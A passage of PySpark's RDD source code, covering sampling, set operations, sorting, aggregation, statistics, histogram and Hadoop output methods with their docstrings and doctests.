Return a new RDD containing the distinct elements in this RDD.
>>> sorted(sc.parallelize([1, 1, 2, 3]).distinct().collect())
[1, 2, 3]
"""
return self.map(lambda x: (x, None)) \
.reduceByKey(lambda x, _: x, numPartitions) \
.map(lambda x: x[0])
def sample(self, withReplacement, fraction, seed=None):
"""
Return a sampled subset of this RDD.
:param withReplacement: can elements be sampled multiple times (replaced when sampled out)
:param fraction: expected size of the sample as a fraction of this RDD's size
without replacement: probability that each element is chosen; fraction must be [0, 1]
with replacement: expected number of times each element is chosen; fraction must be >= 0
:param seed: seed for the random number generator
>>> rdd = sc.parallelize(range(100), 4)
>>> 6 <= rdd.sample(False, 0.1, 81).count() <= 14
True
"""
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(RDDSampler(withReplacement, fraction, seed).func, True)
def randomSplit(self, weights, seed=None):
"""
Randomly splits this RDD with the provided weights.
:param weights: weights for splits, will be normalized if they don't sum to 1
:param seed: random seed
:return: split RDDs in a list
>>> rdd = sc.parallelize(range(500), 1)
>>> rdd1, rdd2 = rdd.randomSplit([2, 3], 17)
>>> len(rdd1.collect() + rdd2.collect())
500
>>> 150 < rdd1.count() < 250
True
>>> 250 < rdd2.count() < 350
True
"""
s = float(sum(weights))
cweights = [0.0]
for w in weights:
cweights.append(cweights[-1] + w / s)
if seed is None:
seed = random.randint(0, 2 ** 32 - 1)
return [self.mapPartitionsWithIndex(RDDRangeSampler(lb, ub, seed).func, True)
for lb, ub in zip(cweights, cweights[1:])]
# this is ported from scala/spark/RDD.scala
def takeSample(self, withReplacement, num, seed=None):
"""
Return a fixed-size sampled subset of this RDD.
>>> rdd = sc.parallelize(range(0, 10))
>>> len(rdd.takeSample(True, 20, 1))
20
>>> len(rdd.takeSample(False, 5, 2))
5
>>> len(rdd.takeSample(False, 15, 3))
10
"""
numStDev = 10.0
if num < 0:
raise ValueError("Sample size cannot be negative.")
elif num == 0:
return []
initialCount = self.count()
if initialCount == 0:
return []
rand = random.Random(seed)
if (not withReplacement) and num >= initialCount:
# shuffle current RDD and return
samples = self.collect()
rand.shuffle(samples)
return samples
maxSampleSize = sys.maxsize - int(numStDev * sqrt(sys.maxsize))
if num > maxSampleSize:
raise ValueError(
"Sample size cannot be greater than %d." % maxSampleSize)
fraction = RDD._computeFractionForSampleSize(
num, initialCount, withReplacement)
samples = self.sample(withReplacement, fraction, seed).collect()
# If the first sample didn't turn out large enough, keep trying to take samples;
# this shouldn't happen often because we use a big multiplier for their initial size.
# See: scala/spark/RDD.scala
while len(samples) < num:
# TODO: add log warning for when more than one iteration was run
seed = rand.randint(0, sys.maxsize)
samples = self.sample(withReplacement, fraction, seed).collect()
rand.shuffle(samples)
return samples[0:num]
@staticmethod
def _computeFractionForSampleSize(sampleSizeLowerBound, total, withReplacement):
"""
Returns a sampling rate that guarantees a sample of
size >= sampleSizeLowerBound 99.99% of the time.
How the sampling rate is determined:
Let p = num / total, where num is the sample size and total is the
total number of data points in the RDD. We're trying to compute
q > p such that
- when sampling with replacement, we're drawing each data point
with prob_i ~ Pois(q), where we want to guarantee
Pr[s < num] < 0.0001 for s = sum(prob_i for i from 0 to
total), i.e. the failure rate of not having a sufficiently large
sample < 0.0001. Setting q = p + 5 * sqrt(p/total) is sufficient
to guarantee 0.9999 success rate for num > 12, but we need a
slightly larger q (9 empirically determined).
- when sampling without replacement, we're drawing each data point
with prob_i ~ Binomial(total, fraction) and our choice of q
guarantees 1-delta, or 0.9999 success rate, where success rate is
defined the same as in sampling with replacement.
"""
fraction = float(sampleSizeLowerBound) / total
if withReplacement:
numStDev = 5
if (sampleSizeLowerBound < 12):
numStDev = 9
return fraction + numStDev * sqrt(fraction / total)
else:
delta = 0.00005
gamma = - log(delta) / total
return min(1, fraction + gamma + sqrt(gamma * gamma + 2 * gamma * fraction))
def union(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> rdd.union(rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if self._jrdd_deserializer == other._jrdd_deserializer:
rdd = RDD(self._jrdd.union(other._jrdd), self.ctx,
self._jrdd_deserializer)
else:
# These RDDs contain data in different serialized formats, so we
# must normalize them to the default serializer.
self_copy = self._reserialize()
other_copy = other._reserialize()
rdd = RDD(self_copy._jrdd.union(other_copy._jrdd), self.ctx,
self.ctx.serializer)
if (self.partitioner == other.partitioner and
self.getNumPartitions() == rdd.getNumPartitions()):
rdd.partitioner = self.partitioner
return rdd
def intersection(self, other):
"""
Return the intersection of this RDD and another one. The output will
not contain any duplicate elements, even if the input RDDs did.
Note that this method performs a shuffle internally.
>>> rdd1 = sc.parallelize([1, 10, 2, 3, 4, 5])
>>> rdd2 = sc.parallelize([1, 6, 2, 3, 7, 8])
>>> rdd1.intersection(rdd2).collect()
[1, 2, 3]
"""
return self.map(lambda v: (v, None)) \
.cogroup(other.map(lambda v: (v, None))) \
.filter(lambda k_vs: all(k_vs[1])) \
.keys()
def _reserialize(self, serializer=None):
serializer = serializer or self.ctx.serializer
if self._jrdd_deserializer != serializer:
self = self.map(lambda x: x, preservesPartitioning=True)
self._jrdd_deserializer = serializer
return self
def __add__(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> (rdd + rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if not isinstance(other, RDD):
raise TypeError
return self.union(other)
def repartitionAndSortWithinPartitions(self, numPartitions=None, partitionFunc=portable_hash,
ascending=True, keyfunc=lambda x: x):
"""
Repartition the RDD according to the given partitioner and, within each resulting partition,
sort records by their keys.
>>> rdd = sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)])
>>> rdd2 = rdd.repartitionAndSortWithinPartitions(2, lambda x: x % 2, 2)
>>> rdd2.glom().collect()
[[(0, 5), (0, 8), (2, 6)], [(1, 3), (3, 8), (3, 8)]]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda k_v: keyfunc(k_v[0]), reverse=(not ascending)))
return self.partitionBy(numPartitions, partitionFunc).mapPartitions(sortPartition, True)
def sortByKey(self, ascending=True, numPartitions=None, keyfunc=lambda x: x):
"""
Sorts this RDD, which is assumed to consist of (key, value) pairs.
# noqa
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortByKey().first()
('1', 3)
>>> sc.parallelize(tmp).sortByKey(True, 1).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortByKey(True, 2).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> tmp2 = [('Mary', 1), ('had', 2), ('a', 3), ('little', 4), ('lamb', 5)]
>>> tmp2.extend([('whose', 6), ('fleece', 7), ('was', 8), ('white', 9)])
>>> sc.parallelize(tmp2).sortByKey(True, 3, keyfunc=lambda k: k.lower()).collect()
[('a', 3), ('fleece', 7), ('had', 2), ('lamb', 5),...('white', 9), ('whose', 6)]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = self._memory_limit()
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda kv: keyfunc(kv[0]), reverse=(not ascending)))
if numPartitions == 1:
if self.getNumPartitions() > 1:
self = self.coalesce(1)
return self.mapPartitions(sortPartition, True)
# first compute the boundary of each part via sampling: we want to partition
# the key-space into bins such that the bins have roughly the same
# number of (key, value) pairs falling into them
rddSize = self.count()
if not rddSize:
return self # empty RDD
maxSampleSize = numPartitions * 20.0 # constant from Spark's RangePartitioner
fraction = min(maxSampleSize / max(rddSize, 1), 1.0)
samples = self.sample(False, fraction, 1).map(lambda kv: kv[0]).collect()
samples = sorted(samples, key=keyfunc)
# we have numPartitions many parts but one of the them has
# an implicit boundary
bounds = [samples[int(len(samples) * (i + 1) / numPartitions)]
for i in range(0, numPartitions - 1)]
def rangePartitioner(k):
p = bisect.bisect_left(bounds, keyfunc(k))
if ascending:
return p
else:
return numPartitions - 1 - p
return self.partitionBy(numPartitions, rangePartitioner).mapPartitions(sortPartition, True)
def sortBy(self, keyfunc, ascending=True, numPartitions=None):
"""
Sorts this RDD by the given keyfunc
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[0]).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[1]).collect()
[('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
"""
return self.keyBy(keyfunc).sortByKey(ascending, numPartitions).values()
def glom(self):
"""
Return an RDD created by coalescing all elements within each partition
into a list.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> sorted(rdd.glom().collect())
[[1, 2], [3, 4]]
"""
def func(iterator):
yield list(iterator)
return self.mapPartitions(func)
def cartesian(self, other):
"""
Return the Cartesian product of this RDD and another one, that is, the
RDD of all pairs of elements C{(a, b)} where C{a} is in C{self} and
C{b} is in C{other}.
>>> rdd = sc.parallelize([1, 2])
>>> sorted(rdd.cartesian(rdd).collect())
[(1, 1), (1, 2), (2, 1), (2, 2)]
"""
# Due to batching, we can't use the Java cartesian method.
deserializer = CartesianDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(self._jrdd.cartesian(other._jrdd), self.ctx, deserializer)
def groupBy(self, f, numPartitions=None, partitionFunc=portable_hash):
"""
Return an RDD of grouped items.
>>> rdd = sc.parallelize([1, 1, 2, 3, 5, 8])
>>> result = rdd.groupBy(lambda x: x % 2).collect()
>>> sorted([(x, sorted(y)) for (x, y) in result])
[(0, [2, 8]), (1, [1, 1, 3, 5])]
"""
return self.map(lambda x: (f(x), x)).groupByKey(numPartitions, partitionFunc)
@ignore_unicode_prefix
def pipe(self, command, env=None, checkCode=False):
"""
Return an RDD created by piping elements to a forked external process.
>>> sc.parallelize(['1', '2', '', '3']).pipe('cat').collect()
[u'1', u'2', u'', u'3']
:param checkCode: whether or not to check the return value of the shell command.
"""
if env is None:
env = dict()
def func(iterator):
pipe = Popen(
shlex.split(command), env=env, stdin=PIPE, stdout=PIPE)
def pipe_objs(out):
for obj in iterator:
s = str(obj).rstrip('\n') + '\n'
out.write(s.encode('utf-8'))
out.close()
Thread(target=pipe_objs, args=[pipe.stdin]).start()
def check_return_code():
pipe.wait()
if checkCode and pipe.returncode:
raise Exception("Pipe function `%s' exited "
"with error code %d" % (command, pipe.returncode))
else:
for i in range(0):
yield i
return (x.rstrip(b'\n').decode('utf-8') for x in
chain(iter(pipe.stdout.readline, b''), check_return_code()))
return self.mapPartitions(func)
def foreach(self, f):
"""
Applies a function to all elements of this RDD.
>>> def f(x): print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreach(f)
"""
def processPartition(iterator):
for x in iterator:
f(x)
return iter([])
self.mapPartitions(processPartition).count() # Force evaluation
def foreachPartition(self, f):
"""
Applies a function to each partition of this RDD.
>>> def f(iterator):
... for x in iterator:
... print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreachPartition(f)
"""
def func(it):
r = f(it)
try:
return iter(r)
except TypeError:
return iter([])
self.mapPartitions(func).count() # Force evaluation
def collect(self):
"""
Return a list that contains all of the elements in this RDD.
"""
with SCCallSiteSync(self.context) as css:
port = self.ctx._jvm.PythonRDD.collectAndServe(self._jrdd.rdd())
return list(_load_from_socket(port, self._jrdd_deserializer))
def reduce(self, f):
"""
Reduces the elements of this RDD using the specified commutative and
associative binary operator. Currently reduces partitions locally.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).reduce(add)
15
>>> sc.parallelize((2 for _ in range(10))).map(lambda x: 1).cache().reduce(add)
10
>>> sc.parallelize([]).reduce(add)
Traceback (most recent call last):
...
ValueError: Can not reduce() empty RDD
"""
def func(iterator):
iterator = iter(iterator)
try:
initial = next(iterator)
except StopIteration:
return
yield reduce(f, iterator, initial)
vals = self.mapPartitions(func).collect()
if vals:
return reduce(f, vals)
raise ValueError("Can not reduce() empty RDD")
def treeReduce(self, f, depth=2):
"""
Reduces the elements of this RDD in a multi-level tree pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeReduce(add)
-5
>>> rdd.treeReduce(add, 1)
-5
>>> rdd.treeReduce(add, 2)
-5
>>> rdd.treeReduce(add, 5)
-5
>>> rdd.treeReduce(add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
zeroValue = None, True # Use the second entry to indicate whether this is a dummy value.
def op(x, y):
if x[1]:
return y
elif y[1]:
return x
else:
return f(x[0], y[0]), False
reduced = self.map(lambda x: (x, False)).treeAggregate(zeroValue, op, op, depth)
if reduced[1]:
raise ValueError("Cannot reduce empty RDD.")
return reduced[0]
def fold(self, zeroValue, op):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given associative and commutative function and
a neutral "zero value."
The function C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
This behaves somewhat differently from fold operations implemented
for non-distributed collections in functional languages like Scala.
This fold operation may be applied to partitions individually, and then
fold those results into the final result, rather than apply the fold
to each element sequentially in some defined ordering. For functions
that are not commutative, the result may differ from that of a fold
applied to a non-distributed collection.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).fold(0, add)
15
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = op(obj, acc)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(op, vals, zeroValue)
def aggregate(self, zeroValue, seqOp, combOp):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given combine functions and a neutral "zero
value."
The functions C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
The first function (seqOp) can return a different result type, U, than
the type of this RDD. Thus, we need one operation for merging a T into
an U and one operation for merging two U
>>> seqOp = (lambda x, y: (x[0] + y, x[1] + 1))
>>> combOp = (lambda x, y: (x[0] + y[0], x[1] + y[1]))
>>> sc.parallelize([1, 2, 3, 4]).aggregate((0, 0), seqOp, combOp)
(10, 4)
>>> sc.parallelize([]).aggregate((0, 0), seqOp, combOp)
(0, 0)
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(combOp, vals, zeroValue)
def treeAggregate(self, zeroValue, seqOp, combOp, depth=2):
"""
Aggregates the elements of this RDD in a multi-level tree
pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeAggregate(0, add, add)
-5
>>> rdd.treeAggregate(0, add, add, 1)
-5
>>> rdd.treeAggregate(0, add, add, 2)
-5
>>> rdd.treeAggregate(0, add, add, 5)
-5
>>> rdd.treeAggregate(0, add, add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
if self.getNumPartitions() == 0:
return zeroValue
def aggregatePartition(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
partiallyAggregated = self.mapPartitions(aggregatePartition)
numPartitions = partiallyAggregated.getNumPartitions()
scale = max(int(ceil(pow(numPartitions, 1.0 / depth))), 2)
# If creating an extra level doesn't help reduce the wall-clock time, we stop the tree
# aggregation.
while numPartitions > scale + numPartitions / scale:
numPartitions /= scale
curNumPartitions = int(numPartitions)
def mapPartition(i, iterator):
for obj in iterator:
yield (i % curNumPartitions, obj)
partiallyAggregated = partiallyAggregated \
.mapPartitionsWithIndex(mapPartition) \
.reduceByKey(combOp, curNumPartitions) \
.values()
return partiallyAggregated.reduce(combOp)
def max(self, key=None):
"""
Find the maximum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([1.0, 5.0, 43.0, 10.0])
>>> rdd.max()
43.0
>>> rdd.max(key=str)
5.0
"""
if key is None:
return self.reduce(max)
return self.reduce(lambda a, b: max(a, b, key=key))
def min(self, key=None):
"""
Find the minimum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([2.0, 5.0, 43.0, 10.0])
>>> rdd.min()
2.0
>>> rdd.min(key=str)
10.0
"""
if key is None:
return self.reduce(min)
return self.reduce(lambda a, b: min(a, b, key=key))
def sum(self):
"""
Add up the elements in this RDD.
>>> sc.parallelize([1.0, 2.0, 3.0]).sum()
6.0
"""
return self.mapPartitions(lambda x: [sum(x)]).fold(0, operator.add)
def count(self):
"""
Return the number of elements in this RDD.
>>> sc.parallelize([2, 3, 4]).count()
3
"""
return self.mapPartitions(lambda i: [sum(1 for _ in i)]).sum()
def stats(self):
"""
Return a L{StatCounter} object that captures the mean, variance
and count of the RDD's elements in one operation.
"""
def redFunc(left_counter, right_counter):
return left_counter.mergeStats(right_counter)
return self.mapPartitions(lambda i: [StatCounter(i)]).reduce(redFunc)
def histogram(self, buckets):
"""
Compute a histogram using the provided buckets. The buckets
are all open to the right except for the last which is closed.
e.g. [1,10,20,50] means the buckets are [1,10) [10,20) [20,50],
which means 1<=x<10, 10<=x<20, 20<=x<=50. And on the input of 1
and 50 we would have a histogram of 1,0,1.
If your histogram is evenly spaced (e.g. [0, 10, 20, 30]),
this can be switched from an O(log n) inseration to O(1) per
element(where n = # buckets).
Buckets must be sorted and not contain any duplicates, must be
at least two elements.
If `buckets` is a number, it will generates buckets which are
evenly spaced between the minimum and maximum of the RDD. For
example, if the min value is 0 and the max is 100, given buckets
as 2, the resulting buckets will be [0,50) [50,100]. buckets must
be at least 1 If the RDD contains infinity, NaN throws an exception
If the elements in RDD do not vary (max == min) always returns
a single bucket.
It will return an tuple of buckets and histogram.
>>> rdd = sc.parallelize(range(51))
>>> rdd.histogram(2)
([0, 25, 50], [25, 26])
>>> rdd.histogram([0, 5, 25, 50])
([0, 5, 25, 50], [5, 20, 26])
>>> rdd.histogram([0, 15, 30, 45, 60]) # evenly spaced buckets
([0, 15, 30, 45, 60], [15, 15, 15, 6])
>>> rdd = sc.parallelize(["ab", "ac", "b", "bd", "ef"])
>>> rdd.histogram(("a", "b", "c"))
(('a', 'b', 'c'), [2, 2])
"""
if isinstance(buckets, int):
if buckets < 1:
raise ValueError("number of buckets must be >= 1")
# filter out non-comparable elements
def comparable(x):
if x is None:
return False
if type(x) is float and isnan(x):
return False
return True
filtered = self.filter(comparable)
# faster than stats()
def minmax(a, b):
return min(a[0], b[0]), max(a[1], b[1])
try:
minv, maxv = filtered.map(lambda x: (x, x)).reduce(minmax)
except TypeError as e:
if " empty " in str(e):
raise ValueError("can not generate buckets from empty RDD")
raise
if minv == maxv or buckets == 1:
return [minv, maxv], [filtered.count()]
try:
inc = (maxv - minv) / buckets
except TypeError:
raise TypeError("Can not generate buckets with non-number in RDD")
if isinf(inc):
raise ValueError("Can not generate buckets with infinite value")
# keep them as integer if possible
inc = int(inc)
if inc * buckets != maxv - minv:
inc = (maxv - minv) * 1.0 / buckets
buckets = [i * inc + minv for i in range(buckets)]
buckets.append(maxv) # fix accumulated error
even = True
elif isinstance(buckets, (list, tuple)):
if len(buckets) < 2:
raise ValueError("buckets should have more than one value")
if any(i is None or isinstance(i, float) and isnan(i) for i in buckets):
raise ValueError("can not have None or NaN in buckets")
if sorted(buckets) != list(buckets):
raise ValueError("buckets should be sorted")
if len(set(buckets)) != len(buckets):
raise ValueError("buckets should not contain duplicated values")
minv = buckets[0]
maxv = buckets[-1]
even = False
inc = None
try:
steps = [buckets[i + 1] - buckets[i] for i in range(len(buckets) - 1)]
except TypeError:
pass # objects in buckets do not support '-'
else:
if max(steps) - min(steps) < 1e-10: # handle precision errors
even = True
inc = (maxv - minv) / (len(buckets) - 1)
else:
raise TypeError("buckets should be a list or tuple or number(int or long)")
def histogram(iterator):
counters = [0] * len(buckets)
for i in iterator:
if i is None or (type(i) is float and isnan(i)) or i > maxv or i < minv:
continue
t = (int((i - minv) / inc) if even
else bisect.bisect_right(buckets, i) - 1)
counters[t] += 1
# add last two together
last = counters.pop()
counters[-1] += last
return [counters]
def mergeCounters(a, b):
return [i + j for i, j in zip(a, b)]
return buckets, self.mapPartitions(histogram).reduce(mergeCounters)
def mean(self):
"""
Compute the mean of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).mean()
2.0
"""
return self.stats().mean()
def variance(self):
"""
Compute the variance of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).variance()
0.666...
"""
return self.stats().variance()
def stdev(self):
"""
Compute the standard deviation of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).stdev()
0.816...
"""
return self.stats().stdev()
def sampleStdev(self):
"""
Compute the sample standard deviation of this RDD's elements (which
corrects for bias in estimating the standard deviation by dividing by
N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleStdev()
1.0
"""
return self.stats().sampleStdev()
def sampleVariance(self):
"""
Compute the sample variance of this RDD's elements (which corrects
for bias in estimating the variance by dividing by N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleVariance()
1.0
"""
return self.stats().sampleVariance()
def countByValue(self):
"""
Return the count of each unique value in this RDD as a dictionary of
(value, count) pairs.
>>> sorted(sc.parallelize([1, 2, 1, 2, 2], 2).countByValue().items())
[(1, 2), (2, 3)]
"""
def countPartition(iterator):
counts = defaultdict(int)
for obj in iterator:
counts[obj] += 1
yield counts
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] += v
return m1
return self.mapPartitions(countPartition).reduce(mergeMaps)
def top(self, num, key=None):
"""
Get the top N elements from a RDD.
Note: It returns the list sorted in descending order.
>>> sc.parallelize([10, 4, 2, 12, 3]).top(1)
[12]
>>> sc.parallelize([2, 3, 4, 5, 6], 2).top(2)
[6, 5]
>>> sc.parallelize([10, 4, 2, 12, 3]).top(3, key=str)
[4, 3, 2]
"""
def topIterator(iterator):
yield heapq.nlargest(num, iterator, key=key)
def merge(a, b):
return heapq.nlargest(num, a + b, key=key)
return self.mapPartitions(topIterator).reduce(merge)
def takeOrdered(self, num, key=None):
"""
Get the N elements from a RDD ordered in ascending order or as
specified by the optional key function.
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7]).takeOrdered(6)
[1, 2, 3, 4, 5, 6]
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7], 2).takeOrdered(6, key=lambda x: -x)
[10, 9, 7, 6, 5, 4]
"""
def merge(a, b):
return heapq.nsmallest(num, a + b, key)
return self.mapPartitions(lambda it: [heapq.nsmallest(num, it, key)]).reduce(merge)
def take(self, num):
"""
Take the first num elements of the RDD.
It works by first scanning one partition, and use the results from
that partition to estimate the number of additional partitions needed
to satisfy the limit.
Translated from the Scala implementation in RDD#take().
>>> sc.parallelize([2, 3, 4, 5, 6]).cache().take(2)
[2, 3]
>>> sc.parallelize([2, 3, 4, 5, 6]).take(10)
[2, 3, 4, 5, 6]
>>> sc.parallelize(range(100), 100).filter(lambda x: x > 90).take(3)
[91, 92, 93]
"""
items = []
totalParts = self.getNumPartitions()
partsScanned = 0
while len(items) < num and partsScanned < totalParts:
# The number of partitions to try in this iteration.
# It is ok for this number to be greater than totalParts because
# we actually cap it at totalParts in runJob.
numPartsToTry = 1
if partsScanned > 0:
# If we didn't find any rows after the previous iteration,
# quadruple and retry. Otherwise, interpolate the number of
# partitions we need to try, but overestimate it by 50%.
# We also cap the estimation in the end.
if len(items) == 0:
numPartsToTry = partsScanned * 4
else:
# the first paramter of max is >=1 whenever partsScanned >= 2
numPartsToTry = int(1.5 * num * partsScanned / len(items)) - partsScanned
numPartsToTry = min(max(numPartsToTry, 1), partsScanned * 4)
left = num - len(items)
def takeUpToNumLeft(iterator):
iterator = iter(iterator)
taken = 0
while taken < left:
yield next(iterator)
taken += 1
p = range(partsScanned, min(partsScanned + numPartsToTry, totalParts))
res = self.context.runJob(self, takeUpToNumLeft, p)
items += res
partsScanned += numPartsToTry
return items[:num]
def first(self):
"""
Return the first element in this RDD.
>>> sc.parallelize([2, 3, 4]).first()
2
>>> sc.parallelize([]).first()
Traceback (most recent call last):
...
ValueError: RDD is empty
"""
rs = self.take(1)
if rs:
return rs[0]
raise ValueError("RDD is empty")
def isEmpty(self):
"""
Returns true if and only if the RDD contains no elements at all. Note that an RDD
may be empty even when it has at least 1 partition.
>>> sc.parallelize([]).isEmpty()
True
>>> sc.parallelize([1]).isEmpty()
False
"""
return self.getNumPartitions() == 0 or len(self.take(1)) == 0
def saveAsNewAPIHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, True)
def saveAsNewAPIHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop job configuration, passed in as a dict (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsNewAPIHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter, jconf)
def saveAsHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, False)
def saveAsHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None,
compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapred.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: (None by default)
:param compressionCodecClass: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter,
jconf, compressionCodecClass)
def saveAsSequenceFile(self, path, compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the L{org.apache.hadoop.io.Writable} types that we convert from the
RDD's key and value types. The mechanism is as follows:
1. Pyrolite is used to convert pickled Python RDD into RDD of Java objects.
2. Keys and values of this Java RDD are converted to Writables and written out.
:param path: path to sequence file
:param compressionCodecClass: (None by default)
"""
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsSequenceFile(pickledRDD._jrdd, True,
path, compressionCodecClass)
def saveAsPickleFile(self, path, batchSize=10):
"""
Save this RDD as a SequenceFile of serialized objects. The serializer
used is L{pyspark.serializers.PickleSerializer}, default batch size
is 10.
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
